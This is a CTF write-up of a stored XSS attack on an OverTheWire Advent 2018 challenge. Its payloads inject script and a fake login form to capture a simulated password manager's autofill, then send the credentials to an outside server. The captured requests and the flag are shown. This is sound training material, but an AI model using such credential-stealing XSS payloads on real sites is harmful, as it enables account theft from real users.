# Santa Claus' Home Page  
Okay this will be quick and dirty to at least document one possible solution
to this challenge.

We are presented with Santas homepage with a list of naught and nice people.
In addition there's a link to a login page (login.php) with a simple login
form with username and password.

Without too much further thinking first steps involved checking if any obvious
sql injections might work ... turned out to not be the case (well, didn't try
harder).

At the beginning when using chrome I missed an important item on that page
though. Since I had ad-blocker enabled it blocked an otherwise visable image
that was hosted on a different host/subdomain.

Santas page was at:` http://santa.advent2018.overthewire.org:1219/`

the ad was coming from here: `
![](http://ad.advent2018.overthewire.org:1219/static/img/adbanner.jpg)`

## adding ads  
So lets head to ad.advent2018.overthewire.org:1219/ and see if there's
something interesting.

Indeed on that site you get an input form where you can leave your "subliminal
message" that will be shown together with the image to users of this site.

Text says this year target for advertising is Santa ... okay what kind of
messages can we sent and what will happen? This looks like we need to look
into some XSS vulnerability on that page.

So lets input something into the msg input field and see where if/where it
ends up on the page.

Startgin with:  
```  
<script>alert('hohoho');</script>  
```

This is part of the html source of the generated page:  
```

Your message will be shown when visitors to our embedded advertisements  
hover over the following image.  
  
![](http://ad.advent2018.overthewire.org:1219/static/img/adbanner.jpg)

```  
So we can inject code into the title attribute of the image ... nice. And it
seems no filtering that would prevent obvious/dangerous javascript is active.

You will notice that the url for the preview site is something like:
http://ad.advent2018.overthewire.org:1219/ad/**Odl4TDuXLm**

And the page redircts to santa the url will be eg.:
http://santa.advent2018.overthewire.org:1219/?/**Odl4TDuXLm**

Okay nice we can inject javascript.

From here it took me quite some time to get to a point to really understand
what needs to be done, then it took forever to figure out how to do this.
Unfortunately not even til end of challange :(

Anyways I figured that the server are still up and running and stumbled over
that open browser tab again a few days later... f..k it will become late again
;)  

Back to the description of the challange:  
> Santa uses a crappy password manager,  
> which leaves traces around in 'window.pwmanagerLog'.  
> Can you get his login credentials? You need to login to get the flag...

So the task really seems easy ... make Santa use his password manager to
login!

So I thought it would be possible to maybe just have some javascript to grab
username and password from the input fields and exfiltrate to an external
server. But I was unsuccessful with that.

My tries include stuff like:  
```  
var u = document.getElementsByName("username")[0].value;  
var p = document.getElementsByName("password")[0].value;  
xhr.open('GET', "http://server.de:12345/?u2="+u+"&p="+p); xhr.send();  
```

Nothing useful ... also I wasn't sure about the pwmangerLog thing. So Lets see
if we can get something if that is accessed. You can define getters and
setters on javascript objects. With this it might be possible to get some
trigger running once the password manager does write to the log.  
My solution for this after a while was:

```  
free beer'><script>  
window.__defineSetter__("pwmanagerLog",
function(val){document.location="http://server.de:12345/?data="+btoa(val);
this.pwmanagerLog=val; });  
</script>  
```

we got a request on our server with:  
```  
GET /?data=RmFpbHVyZTogVVJMIGRvZXMgbm90IGVuZCBpbiAvbG9naW4ucGhw HTTP/1.1  
```  
**-> Failure: URL does not end in /login.php**

Next try, maybe can just append login.php to location.href:  
```

free beer'>  
<script>  
window.location.href = document.location+"#/login.php";  
window.__defineSetter__("pwmanagerLog",
function(val){document.location="http://server.de:12345/?data="+btoa(val); });  
</script>  
```  
**Failure: No forms present!!!**

... getting better but we need a form:

```  
free beer'>  
<script>  
window.location.href = document.location+"#/login.php";  
</script>  
<form class="login" method="POST" action="#/login.php">  
<input type="text" name="username" placeholder="Username">  
<input type="password" name="password" placeholder="Password">  
<button type="submit" class="float">Login</button>  
</form>  
<script>  
window.__defineSetter__("pwmanagerLog",
function(val){document.location="http://server.de:12345/?data="+btoa(val); });  
</script>  
```  
**GET /?data=Success! Valid login form recognized. HTTP/1.1**

Cool, but where's Santas password? So here I'm unsure if it should actually
show up in the pwmanagerLog as well...

Anyway since we have a valid form lets just grab it from there ... here the
first tries again failed and there was only empty username password sent back.
But due probalby because the setter callback took longer we also received the
username/password request on our server before the pwmanger log message ...

So it might help to just wait a few seconds to get the form filled out and
then try this again ... so my final ad message looked like this (at this point
the setter probably does not need to be send again:

```  
free beer'>  
<script>  
window.location.href = document.location+"#/login.php";  
</script>  
<form class="login" method="POST" action="#/login.php">  
<input type="text" name="username" placeholder="Username">  
<input type="password" name="password" placeholder="Password">  
<button type="submit" class="float">Login</button>  
</form>  
<script>  
window.__defineSetter__("pwmanagerLog", function(val){ var xhr=new
XMLHttpRequest(); xhr.open("GET", "http://server.de:12345/?data="+btoa(val));
xhr.send(); });  
setTimeout(function(){ var x2 = new XMLHttpRequest(); x2.open("GET",
"http://server.de:12345/?u="+btoa(document.getElementsByName("username")[0].value)+"&p="+btoa(document.getElementsByName("password")[0].value));
x2.send(); }, 6000);  
</script>  
```

here's parts of the request that arrived on the server side:  
```

GET /?data=U3VjY2VzcyEgVmFsaWQgbG9naW4gZm9ybSByZWNvZ25pemVkLg== HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/37.0.2062.120 Safari/537.36  
Referer: http://santa.advent2018.overthewire.org:1219/?LD6VakUUPR  
Origin: http://santa.advent2018.overthewire.org:1219  
Accept: */*  
Connection: Keep-Alive  
Accept-Encoding: gzip, deflate  
Accept-Language: en,*  
Host: server.de:12345

GET /?u=U2FudGFDbGF1cw==&p=UGEkc1doMGgwaDByRA== HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/37.0.2062.120 Safari/537.36  
Referer: http://santa.advent2018.overthewire.org:1219/?ouSaWrRaAq  
Origin: http://santa.advent2018.overthewire.org:1219  
Accept: */*  
Connection: Keep-Alive  
Accept-Encoding: gzip, deflate  
Accept-Language: en,*  
Host: server.de:12345  
```

and et voila ... here we go ....

***u=SantaClaus***  
***p=Pa$sWh0h0h0rD***

```  
You logged in successfully!!!  
Here is some candy:  
AOTW{m4ke_list__ch3ck_ch3ck!}  
```